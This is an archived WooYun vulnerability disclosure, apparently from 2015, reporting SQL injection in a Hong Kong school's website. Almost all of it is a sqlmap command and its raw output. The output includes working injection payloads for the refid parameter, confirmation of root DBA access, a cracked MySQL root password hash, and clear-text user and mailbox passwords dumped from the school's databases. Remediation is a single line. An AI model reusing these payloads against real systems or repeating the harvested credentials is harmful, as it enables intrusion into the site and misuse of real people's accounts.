乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-03: 细节已通知厂商并且等待厂商处理中 2015-12-08: 厂商已经主动忽略漏洞,细节向公众公开
Jockey Club Ti-I College主站存在SQL注射漏洞(DBA权限+root密码+1000多W网站访问记录+用户明文密码)
地址:http://**.**.**.**/it-school/php/webcms/public/index.php3?refid=1104&mode=published&lang=en&nocache1402373480
$ python sqlmap.py -u "http://**.**.**.**/it-school/php/webcms/public/index.php3?refid=1104&mode=published&lang=en&nocache1402373480" -p refid --technique=BE --random-agent --batch --no-cast --current-user --is-dba --users --passwords --cunt --search -C pass --output-dir=output
current user: 'root@localhost'current user is DBA: Truedatabase management system users [5]:[*] ''@'localhost'[*] ''@'localhost.localdomain'[*] 'root'@'**.**.**.**'[*] 'root'@'localhost'[*] 'root'@'localhost.localdomain'database management system users password hashes:[*] root [2]: password hash: *0CB5F227B3E98395CA0C6F1427427E77ADF49F89 clear-text password: 1234qwer password hash: NULL
Database: itschool+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| webcms_counter | 16140429 |Database: itschoolTable: webcms_counter[4 columns]+-----------+-------------+| Column | Type |+-----------+-------------+| countid | int(11) || ip | varchar(20) || visitday | date || visittime | time |+-----------+-------------+
Database: itschoolTable: ituser[13 entries]+--------------+| password |+--------------+| 1234 || 1qa3ed5tg || 321 || 321 || 6ymrrrzm || gmnngmg3 || itschool || killyouyeah1 || ltc || road2002 || test01_t || z3459315 || z8322822 |+--------------+
---Parameter: refid (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: refid=1104 RLIKE (SELECT (CASE WHEN (8072=8072) THEN 1104 ELSE 0x28 END))&mode=published&lang=en&nocache1402373480 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: refid=1104 AND (SELECT 8375 FROM(SELECT COUNT(*),CONCAT(0x7162717171,(SELECT (ELT(8375=8375,1))),0x7176627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&mode=published&lang=en&nocache1402373480---web server operating system: Linux CentOS 6.5web application technology: PHP 5.3.3, Apache 2.2.15back-end DBMS: MySQL 5.0current user: 'root@localhost'current user is DBA: Truedatabase management system users [5]:[*] ''@'localhost'[*] ''@'localhost.localdomain'[*] 'root'@'**.**.**.**'[*] 'root'@'localhost'[*] 'root'@'localhost.localdomain'database management system users password hashes:[*] root [2]: password hash: *0CB5F227B3E98395CA0C6F1427427E77ADF49F89 clear-text password: 1234qwer password hash: NULLDatabase: itschool+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| webcms_counter | 16140429 || photo | 5414 || logbook | 2017 || webcms_item_component | 399 || webcms_page_temp_template | 359 || webcms_page_temp_content | 342 || webcms_page_content | 334 || webcms_latest_news | 255 || webcms_page_template | 247 || ecard_datafile | 246 || webcms_item_page_status | 239 || privilege | 184 || webcms_items | 184 || menuitem | 149 || ecard | 118 || mingpao_prize | 106 || page_privilege | 101 || actionlog | 81 || mingpao_news_forum_word_filter | 71 || mingpao_usergroup_privilege | 69 || webcms_remarks | 69 || photoalbum | 67 || webcms_upload_files | 57 || myid_module | 51 || webcms_link_content | 46 || webcms_page_content_list | 45 || webcms_latest_news_attachment | 35 || menucat | 30 || usergroup_privilege | 25 || mingpao_engine_rule | 24 || sch_leave | 21 || webcms_album | 20 || myit_schoolsubject | 18 || webcms_waiting_publish | 17 || mingpao_scoring | 16 || webcms_template_detail | 16 || mingpao_rank | 15 || ecard_type | 13 || ituser | 13 || user_usergroup | 13 || userlog | 13 || userprofile | 13 || webcms_top_banner | 13 || changjie_certificate | 12 || mingpao_privilege | 12 || parent_notice_questionnaire | 12 || rss_reader_user | 12 || webcms_cal | 12 || webcms_mini_banner | 12 || webcms_newbanner | 12 || changjie_level | 10 || mingpao_news_forum_face | 10 || webcms_indexbannerslide | 10 || sch_leavecat | 9 || webcms_template_info | 8 || changjie_user_grade | 6 || mail_folder | 6 || mail_restrict_recipient_permission | 6 || mingpao_box_myid_link | 6 || mingpao_news_type | 6 || mingpao_user_read_level | 6 || photoalbum_lastview | 6 || resdb_url | 6 || usergroup | 6 || wid_template | 6 || changjie_mission | 5 || tvs_channel_template | 5 || imap_mailbox | 4 || mingpao_box | 4 || mingpao_usergroup | 4 || parent_notice | 4 || webcms_schdirection | 4 || webcms_schdocument | 4 || changjie_settings | 3 || mingpao_news_forum_topic_template | 3 || mingpao_read_level | 3 || myid_lock_status | 3 || myid_msg_centre_module_setting | 3 || mysql_sessions | 3 || parent_notice_file | 3 || sch_leaveapplicationform | 3 || webcms_motto_of_this_week | 3 || webcms_motto_of_this_week1 | 3 || changjie_grade | 2 || changjie_notice | 2 || frontpagenotice_read_record | 2 || linuxsys_useraccountquota | 2 || login_language_type | 2 || parent_news_group | 2 || parent_notice_content | 2 || parent_notice_read | 2 || parent_notice_users | 2 || parent_notice_users_alias | 2 || photoalbum_quota | 2 || resdb_readonly | 2 || sch_semester | 2 || school_calendar | 2 || webcms_main_banner | 2 || webcms_public_newsboard | 2 || attend_basic_info | 1 || attend_pic | 1 || attend_smart_final_record | 1 || cal_preference | 1 || disforum_cat | 1 || disforum_forum | 1 || disforum_master | 1 || disforum_privilege | 1 || mailsize | 1 || mingpao_student_box | 1 || mingpao_user | 1 || myit_modulefunction | 1 || newscategory | 1 || parent_news | 1 || parent_news_read | 1 || parent_news_read_record | 1 || parent_notice_user_reply | 1 || perdb_quota | 1 || perhp_quota | 1 || resdb_admin | 1 || resdb_folder | 1 || resdbgroup_quota | 1 || resource_setting | 1 || rss_reader | 1 || sch_info | 1 || sch_year | 1 || tvs_mode | 1 || tvs_setting | 1 || user_widget | 1 || webcms_honor_list | 1 || webcms_message_announce | 1 || webcms_weekly_message | 1 || wid_setting | 1 || ws_ticket | 1 |+---------------------------------------+---------+Database: itschool_bak+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| photo | 16663 || webcms_counter | 6755 || ecard_datafile | 246 || photoalbum | 233 || webcms_item_component | 217 || webcms_page_temp_template | 192 || webcms_page_temp_content | 190 || webcms_page_content | 185 || privilege | 184 || menuitem | 149 || ecard | 118 || webcms_page_template | 107 || mingpao_prize | 106 || usergroup_privilege | 105 || page_privilege | 101 || webcms_items | 98 || webcms_latest_news | 96 || mingpao_news_forum_word_filter | 71 || mingpao_usergroup_privilege | 69 || webcms_upload_files | 57 || myid_module | 51 || webcms_remarks | 48 || webcms_page_content_list | 45 || menucat | 30 || webcms_link_content | 25 || mingpao_engine_rule | 24 || sch_leave | 21 || webcms_latest_news_attachment | 21 || myit_schoolsubject | 18 || mingpao_scoring | 16 || mingpao_rank | 15 || logbook | 14 || webcms_template_detail | 14 || ecard_type | 13 || changjie_certificate | 12 || mingpao_privilege | 12 || rss_reader_user | 12 || webcms_album | 12 || webcms_cal | 12 || webcms_mini_banner | 12 || changjie_level | 10 || mingpao_news_forum_face | 10 || webcms_indexbannerslide | 10 || photoalbum_lastview | 9 || sch_leavecat | 9 || webcms_newbanner | 9 || webcms_template_info | 8 || changjie_user_grade | 6 || mail_folder | 6 || mail_restrict_recipient_permission | 6 || mingpao_box_myid_link | 6 || mingpao_news_type | 6 || mingpao_user_read_level | 6 || resdb_url | 6 || usergroup | 6 || wid_template | 6 || changjie_mission | 5 || tvs_channel_template | 5 || webcms_top_banner | 5 || imap_mailbox | 4 || mingpao_box | 4 || mingpao_usergroup | 4 || webcms_schdirection | 4 || webcms_schdocument | 4 || changjie_settings | 3 || mingpao_news_forum_topic_template | 3 || mingpao_read_level | 3 || myid_lock_status | 3 || sch_leaveapplicationform | 3 || webcms_motto_of_this_week | 3 || webcms_motto_of_this_week1 | 3 || changjie_grade | 2 || changjie_notice | 2 || ituser | 2 || linuxsys_useraccountquota | 2 || login_language_type | 2 || resdb_readonly | 2 || school_calendar | 2 || user_usergroup | 2 || webcms_main_banner | 2 || webcms_public_newsboard | 2 || webcms_waiting_publish | 2 || attend_basic_info | 1 || attend_pic | 1 || attend_smart_final_record | 1 || disforum_cat | 1 || disforum_forum | 1 || disforum_master | 1 || disforum_privilege | 1 || mailsize | 1 || mingpao_student_box | 1 || mingpao_user | 1 || myit_modulefunction | 1 || newscategory | 1 || perdb_quota | 1 || perhp_quota | 1 || photoalbum_quota | 1 || resdb_admin | 1 || resdb_folder | 1 || resdbgroup_quota | 1 || resource_setting | 1 || rss_reader | 1 || tvs_mode | 1 || tvs_setting | 1 || user_widget | 1 || userlog | 1 || userprofile | 1 || webcms_honor_list | 1 || webcms_message_announce | 1 || webcms_weekly_message | 1 || wid_setting | 1 |+---------------------------------------+---------+Database: information_schema+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| COLUMNS | 13634 || STATISTICS | 4256 || KEY_COLUMN_USAGE | 3307 || TABLES | 2505 || PARTITIONS | 2504 || TABLE_CONSTRAINTS | 2229 || GLOBAL_STATUS | 291 || SESSION_STATUS | 291 || GLOBAL_VARIABLES | 277 || SESSION_VARIABLES | 277 || COLLATION_CHARACTER_SET_APPLICABILITY | 130 || COLLATIONS | 129 || USER_PRIVILEGES | 83 || CHARACTER_SETS | 36 || SCHEMA_PRIVILEGES | 32 || PROCESSLIST | 20 || PLUGINS | 7 || ENGINES | 5 || SCHEMATA | 5 |+---------------------------------------+---------+Database: mysql+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| help_relation | 1009 || help_topic | 510 || help_keyword | 453 || help_category | 40 || `user` | 5 || db | 2 |+---------------------------------------+---------+columns LIKE 'pass' were found in the following databases:Database: itschoolTable: imap_mailbox[1 column]+----------+-------------+| Column | Type |+----------+-------------+| password | varchar(50) |+----------+-------------+Database: itschoolTable: alumni_waiting_approval_user[1 column]+----------+-------------+| Column | Type |+----------+-------------+| password | varchar(20) |+----------+-------------+Database: itschoolTable: qbankexecrise[1 column]+-------------+-------+| Column | Type |+-------------+-------+| passingmark | float |+-------------+-------+Database: itschoolTable: linuxsys_useraccountquota[1 column]+---------------+-------------+| Column | Type |+---------------+-------------+| linuxPassword | varchar(50) |+---------------+-------------+Database: itschoolTable: ecpstestex[1 column]+-------------+---------+| Column | Type |+-------------+---------+| passingmark | int(11) |+-------------+---------+Database: itschoolTable: delete_user_pool[1 column]+----------+-------------+| Column | Type |+----------+-------------+| password | varchar(50) |+----------+-------------+Database: itschoolTable: ytcps_net_reading_passage_circle[3 columns]+------------------+----------+| Column | Type |+------------------+----------+| passage_dttm | datetime || passage_dttm_end | datetime || passage_id | int(11) |+------------------+----------+Database: itschoolTable: ecpstestex_temp[1 column]+-------------+---------+| Column | Type |+-------------+---------+| passingmark | int(11) |+-------------+---------+Database: itschoolTable: qbankqpaper_temp[1 column]+-------------+-------+| Column | Type |+-------------+-------+| passingmark | float |+-------------+-------+Database: itschoolTable: qbankqpaper[1 column]+-------------+-------+| Column | Type |+-------------+-------+| passingmark | float |+-------------+-------+Database: itschoolTable: qbankdoconlinetest_temp[1 column]+-------------+-------+| Column | Type |+-------------+-------+| passingmark | float |+-------------+-------+Database: itschoolTable: qbankdoconlinetest[1 column]+-------------+-------+| Column | Type |+-------------+-------+| passingmark | float |+-------------+-------+Database: itschoolTable: ytcps_net_reading_passage_content[1 column]+------------+---------+| Column | Type |+------------+---------+| passage_id | int(11) |+------------+---------+Database: itschoolTable: ers_reading_book_map[1 column]+-------------+-------+| Column | Type |+-------------+-------+| passingmark | float |+-------------+-------+Database: itschoolTable: ituser[1 column]+----------+-------------+| Column | Type |+----------+-------------+| password | varchar(50) |+----------+-------------+Database: itschoolTable: ytcps_net_reading_paper[1 column]+-------------+---------+| Column | Type |+-------------+---------+| passingmark | int(11) |+-------------+---------+Database: itschoolTable: itpark_levels[1 column]+----------------+------------+| Column | Type |+----------------+------------+| passing_points | tinyint(4) |+----------------+------------+Database: itschoolTable: alumni_user_info[1 column]+----------+-------------+| Column | Type |+----------+-------------+| password | varchar(20) |+----------+-------------+Database: itschoolTable: ytcps_net_reading_passage[1 column]+------------+---------+| Column | Type |+------------+---------+| passage_id | int(11) |+------------+---------+Database: itschoolTable: mail_external_filter_log[1 column]+--------+---------+| Column | Type |+--------+---------+| pass | int(11) |+--------+---------+Database: itschoolTable: ex_school[1 column]+-------------+--------------+| Column | Type |+-------------+--------------+| db_password | varchar(255) |+-------------+--------------+Database: itschoolTable: flashchirecords[1 column]+--------+---------------+| Column | Type |+--------+---------------+| passed | enum('Y','N') |+--------+---------------+Database: itschoolTable: ers_reading_paper[1 column]+-------------+-------+| Column | Type |+-------------+-------+| passingmark | float |+-------------+-------+Database: itschoolTable: perdbfolder[1 column]+----------+------------+| Column | Type |+----------+------------+| password | varchar(8) |+----------+------------+Database: itschoolTable: linuxsys_server[3 columns]+------------+-------------+| Column | Type |+------------+-------------+| passwd | varchar(50) || password | varchar(50) || suPassword | varchar(50) |+------------+-------------+Database: itschoolTable: ers_reading_report[1 column]+-----------+---------+| Column | Type |+-----------+---------+| is_passed | char(1) |+-----------+---------+Database: itschoolTable: ytcps_net_reading_report[1 column]+-----------+---------+| Column | Type |+-----------+---------+| is_passed | char(1) |+-----------+---------+Database: itschool_bakTable: imap_mailbox[1 column]+----------+-------------+| Column | Type |+----------+-------------+| password | varchar(50) |+----------+-------------+Database: itschool_bakTable: alumni_waiting_approval_user[1 column]+----------+-------------+| Column | Type |+----------+-------------+| password | varchar(20) |+----------+-------------+Database: itschool_bakTable: qbankexecrise[1 column]+-------------+-------+| Column | Type |+-------------+-------+| passingmark | float |+-------------+-------+Database: itschool_bakTable: linuxsys_useraccountquota[1 column]+---------------+-------------+| Column | Type |+---------------+-------------+| linuxPassword | varchar(50) |+---------------+-------------+Database: itschool_bakTable: ecpstestex[1 column]+-------------+---------+| Column | Type |+-------------+---------+| passingmark | int(11) |+-------------+---------+Database: itschool_bakTable: delete_user_pool[1 column]+----------+-------------+| Column | Type |+----------+-------------+| password | varchar(50) |+----------+-------------+Database: itschool_bakTable: ytcps_net_reading_passage_circle[3 columns]+------------------+----------+| Column | Type |+------------------+----------+| passage_dttm | datetime || passage_dttm_end | datetime || passage_id | int(11) |+------------------+----------+Database: itschool_bakTable: ecpstestex_temp[1 column]+-------------+---------+| Column | Type |+-------------+---------+| passingmark | int(11) |+-------------+---------+Database: itschool_bakTable: qbankqpaper_temp[1 column]+-------------+-------+| Column | Type |+-------------+-------+| passingmark | float |+-------------+-------+Database: itschool_bakTable: qbankqpaper[1 column]+-------------+-------+| Column | Type |+-------------+-------+| passingmark | float |+-------------+-------+Database: itschool_bakTable: qbankdoconlinetest_temp[1 column]+-------------+-------+| Column | Type |+-------------+-------+| passingmark | float |+-------------+-------+Database: itschool_bakTable: qbankdoconlinetest[1 column]+-------------+-------+| Column | Type |+-------------+-------+| passingmark | float |+-------------+-------+Database: itschool_bakTable: ytcps_net_reading_passage_content[1 column]+------------+---------+| Column | Type |+------------+---------+| passage_id | int(11) |+------------+---------+Database: itschool_bakTable: ers_reading_book_map[1 column]+-------------+-------+| Column | Type |+-------------+-------+| passingmark | float |+-------------+-------+Database: itschool_bakTable: ituser[1 column]+----------+-------------+| Column | Type |+----------+-------------+| password | varchar(50) |+----------+-------------+Database: itschool_bakTable: ytcps_net_reading_paper[1 column]+-------------+---------+| Column | Type |+-------------+---------+| passingmark | int(11) |+-------------+---------+Database: itschool_bakTable: itpark_levels[1 column]+----------------+------------+| Column | Type |+----------------+------------+| passing_points | tinyint(4) |+----------------+------------+Database: itschool_bakTable: alumni_user_info[1 column]+----------+-------------+| Column | Type |+----------+-------------+| password | varchar(20) |+----------+-------------+Database: itschool_bakTable: ytcps_net_reading_passage[1 column]+------------+---------+| Column | Type |+------------+---------+| passage_id | int(11) |+------------+---------+Database: itschool_bakTable: mail_external_filter_log[1 column]+--------+---------+| Column | Type |+--------+---------+| pass | int(11) |+--------+---------+Database: itschool_bakTable: ex_school[1 column]+-------------+--------------+| Column | Type |+-------------+--------------+| db_password | varchar(255) |+-------------+--------------+Database: itschool_bakTable: flashchirecords[1 column]+--------+---------------+| Column | Type |+--------+---------------+| passed | enum('Y','N') |+--------+---------------+Database: itschool_bakTable: ers_reading_paper[1 column]+-------------+-------+| Column | Type |+-------------+-------+| passingmark | float |+-------------+-------+Database: itschool_bakTable: perdbfolder[1 column]+----------+------------+| Column | Type |+----------+------------+| password | varchar(8) |+----------+------------+Database: itschool_bakTable: linuxsys_server[3 columns]+------------+-------------+| Column | Type |+------------+-------------+| passwd | varchar(50) || password | varchar(50) || suPassword | varchar(50) |+------------+-------------+Database: itschool_bakTable: ers_reading_report[1 column]+-----------+---------+| Column | Type |+-----------+---------+| is_passed | char(1) |+-----------+---------+Database: itschool_bakTable: ytcps_net_reading_report[1 column]+-----------+---------+| Column | Type |+-----------+---------+| is_passed | char(1) |+-----------+---------+Database: mysqlTable: user[1 column]+----------+----------+| Column | Type |+----------+----------+| Password | char(41) |+----------+----------+Database: mysqlTable: servers[1 column]+----------+----------+| Column | Type |+----------+----------+| Password | char(64) |+----------+----------+Database: itschoolTable: imap_mailbox[4 entries]+-----------+| password |+-----------+| || || 4rf6yh8ik || itschool |+-----------+Database: itschoolTable: alumni_waiting_approval_user[0 entries]+----------+| password |+----------++----------+Database: itschoolTable: qbankexecrise[0 entries]+-------------+| passingmark |+-------------++-------------+Database: itschoolTable: linuxsys_useraccountquota[2 entries]+---------------+| linuxPassword |+---------------+| 4rf6yh8ik || itschool |+---------------+Database: itschoolTable: delete_user_pool[0 entries]+----------+| password |+----------++----------+Database: itschoolTable: ecpstestex[0 entries]+-------------+| passingmark |+-------------++-------------+Database: itschoolTable: ytcps_net_reading_passage_circle[0 entries]+--------------+------------------+------------+| passage_dttm | passage_dttm_end | passage_id |+--------------+------------------+------------++--------------+------------------+------------+Database: itschoolTable: ecpstestex_temp[0 entries]+-------------+| passingmark |+-------------++-------------+Database: itschoolTable: qbankqpaper_temp[0 entries]+-------------+| passingmark |+-------------++-------------+Database: itschoolTable: qbankqpaper[0 entries]+-------------+| passingmark |+-------------++-------------+Database: itschoolTable: qbankdoconlinetest_temp[0 entries]+-------------+| passingmark |+-------------++-------------+Database: itschoolTable: qbankdoconlinetest[0 entries]+-------------+| passingmark |+-------------++-------------+Database: itschoolTable: ytcps_net_reading_passage_content[0 entries]+------------+| passage_id |+------------++------------+Database: itschoolTable: ers_reading_book_map[0 entries]+-------------+| passingmark |+-------------++-------------+Database: itschoolTable: ituser[13 entries]+--------------+| password |+--------------+| 1234 || 1qa3ed5tg || 321 || 321 || 6ymrrrzm || gmnngmg3 || itschool || killyouyeah1 || ltc || road2002 || test01_t || z3459315 || z8322822 |+--------------+Database: itschoolTable: ytcps_net_reading_paper[0 entries]+-------------+| passingmark |+-------------++-------------+Database: itschoolTable: itpark_levels[0 entries]+----------------+| passing_points |+----------------++----------------+Database: itschoolTable: alumni_user_info[0 entries]+----------+| password |+----------++----------+Database: itschoolTable: ytcps_net_reading_passage[0 entries]+------------+| passage_id |+------------++------------+Database: itschoolTable: mail_external_filter_log[0 entries]+------+| pass |+------++------+Database: itschoolTable: ex_school[0 entries]+-------------+| db_password |+-------------++-------------+Database: itschoolTable: flashchirecords[0 entries]+--------+| passed |+--------++--------+Database: itschoolTable: ers_reading_paper[0 entries]+-------------+| passingmark |+-------------++-------------+Database: itschoolTable: perdbfolder[0 entries]+----------+| password |+----------++----------+Database: itschoolTable: linuxsys_server[0 entries]+--------+----------+------------+| passwd | password | suPassword |+--------+----------+------------++--------+----------+------------+Database: itschoolTable: ers_reading_report[0 entries]+-----------+| is_passed |+-----------++-----------+Database: itschoolTable: ytcps_net_reading_report[0 entries]+-----------+| is_passed |+-----------++-----------+Database: itschool_bakTable: imap_mailbox[4 entries]+-----------+| password |+-----------+| || || 4rf6yh8ik || itschool |+-----------+Database: itschool_bakTable: alumni_waiting_approval_user[0 entries]+----------+| password |+----------++----------+Database: itschool_bakTable: qbankexecrise[0 entries]+-------------+| passingmark |+-------------++-------------+Database: itschool_bakTable: linuxsys_useraccountquota[2 entries]+---------------+| linuxPassword |+---------------+| 4rf6yh8ik || itschool |+---------------+Database: itschool_bakTable: delete_user_pool[0 entries]+----------+| password |+----------++----------+Database: itschool_bakTable: ecpstestex[0 entries]+-------------+| passingmark |+-------------++-------------+Database: itschool_bakTable: ytcps_net_reading_passage_circle[0 entries]+--------------+------------------+------------+| passage_dttm | passage_dttm_end | passage_id |+--------------+------------------+------------++--------------+------------------+------------+Database: itschool_bakTable: ecpstestex_temp[0 entries]+-------------+| passingmark |+-------------++-------------+Database: itschool_bakTable: qbankqpaper_temp[0 entries]+-------------+| passingmark |+-------------++-------------+Database: itschool_bakTable: qbankqpaper[0 entries]+-------------+| passingmark |+-------------++-------------+Database: itschool_bakTable: qbankdoconlinetest_temp[0 entries]+-------------+| passingmark |+-------------++-------------+Database: itschool_bakTable: qbankdoconlinetest[0 entries]+-------------+| passingmark |+-------------++-------------+Database: itschool_bakTable: ytcps_net_reading_passage_content[0 entries]+------------+| passage_id |+------------++------------+Database: itschool_bakTable: ers_reading_book_map[0 entries]+-------------+| passingmark |+-------------++-------------+Database: itschool_bakTable: ituser[2 entries]+-----------+| password |+-----------+| 1qa3ed5tg || itschool |+-----------+Database: itschool_bakTable: ytcps_net_reading_paper[0 entries]+-------------+| passingmark |+-------------++-------------+Database: itschool_bakTable: itpark_levels[0 entries]+----------------+| passing_points |+----------------++----------------+Database: itschool_bakTable: alumni_user_info[0 entries]+----------+| password |+----------++----------+Database: itschool_bakTable: ytcps_net_reading_passage[0 entries]+------------+| passage_id |+------------++------------+Database: itschool_bakTable: mail_external_filter_log[0 entries]+------+| pass |+------++------+Database: itschool_bakTable: ex_school[0 entries]+-------------+| db_password |+-------------++-------------+Database: itschool_bakTable: flashchirecords[0 entries]+--------+| passed |+--------++--------+Database: itschool_bakTable: ers_reading_paper[0 entries]+-------------+| passingmark |+-------------++-------------+Database: itschool_bakTable: perdbfolder[0 entries]+----------+| password |+----------++----------+Database: itschool_bakTable: linuxsys_server[0 entries]+--------+----------+------------+| passwd | password | suPassword |+--------+----------+------------++--------+----------+------------+Database: itschool_bakTable: ers_reading_report[0 entries]+-----------+| is_passed |+-----------++-----------+Database: itschool_bakTable: ytcps_net_reading_report[0 entries]+-----------+| is_passed |+-----------++-----------+Database: mysqlTable: user[5 entries]+------------------------------------------------------+| Password |+------------------------------------------------------+| *0CB5F227B3E98395CA0C6F1427427E77ADF49F89 (1234qwer) |||||+------------------------------------------------------+Database: mysqlTable: servers[0 entries]+----------+| Password |+----------++----------+sqlmap resumed the following injection point(s) from stored session:---Parameter: refid (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: refid=1104 RLIKE (SELECT (CASE WHEN (8072=8072) THEN 1104 ELSE 0x28 END))&mode=published&lang=en&nocache1402373480 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: refid=1104 AND (SELECT 8375 FROM(SELECT COUNT(*),CONCAT(0x7162717171,(SELECT (ELT(8375=8375,1))),0x7176627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&mode=published&lang=en&nocache1402373480---web server operating system: Linux CentOS 6.5web application technology: PHP 5.3.3, Apache 2.2.15back-end DBMS: MySQL 5.0Database: itschoolTable: webcms_counter[4 columns]+-----------+-------------+| Column | Type |+-----------+-------------+| countid | int(11) || ip | varchar(20) || visitday | date || visittime | time |+-----------+-------------+
上WAF。
危害等级:无影响厂商忽略
忽略时间:2015-12-08 11:28
暂无
